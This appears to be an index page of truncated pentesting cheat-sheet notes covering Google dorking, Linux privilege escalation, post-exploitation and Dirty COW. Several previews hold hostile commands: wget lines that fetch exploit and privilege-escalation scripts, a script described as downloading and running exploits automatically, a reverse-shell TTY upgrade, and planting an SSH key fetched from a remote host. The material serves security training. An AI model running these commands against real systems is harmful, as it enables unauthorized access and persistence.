Latest notes for PenTesting- MrLeet


MrLeet provides materials allowing anyone to gain practical hands-on experience with digital security, computer applications and network administration tasks.

Google Hacking

Google search to find website sub domains
site:microsoft.com

Google filetype, and intitle
intitle:"netbotz appliance" "OK" -filetype:pdf

Google inurl
inurl:"level/15/sexec/-/show"

Google Hacking Database:
https://www.exploit-...


Score: 0


Set the Target IP Address to the $ip system variable
export ip=192.168.1.100

Find the location of a file
locate sbd.exe

Search through directories in the $PATH environment variable
which sbd

Find a search for a file that contains a specific string in it’s name:
find / -name sbd\*

Show active int...


Score: 0


Scripts to run

The following script runs exploit suggester and automatically downloads and executes suggested exploits:
https://raw.githubusercontent.com/codingo/OSCP-1/master/xploitdeli.py
wget http://www.securitysift.com/download/linuxprivchecker.py
wget https://github.com/pentestmonkey/unix-privesc-check

Other scripts:
wget https://raw...


Score: 0


Linux elevation of privileges, manual testing
Things to look: Miss-configured services (cronjobs), incorrect file permissions (exportfs, sudo), miss-configured environment ($PATH), binary with SUID bit, software or OS with known vulnerabilities.

First try simple sudo:
$ sudo su -

What can we run with sudo?
$ sudo -l

Try su as all users ...


Score: 1


Post exploitation
Get a TTY shell after a reverse shell connection
$ python -c 'import pty;pty.spawn("/bin/bash")'
Set PATH TERM and SHELL if missing:
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=bash

Add public key to authorized keys:
$ echo $(wget https://A...


Score: 0


Why is it called the Dirty COW bug?
"A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings. An unprivileged local user could use this flaw to gain write access to otherwise read-only memory mappings and thus increase their privileges on the ...


Score: 0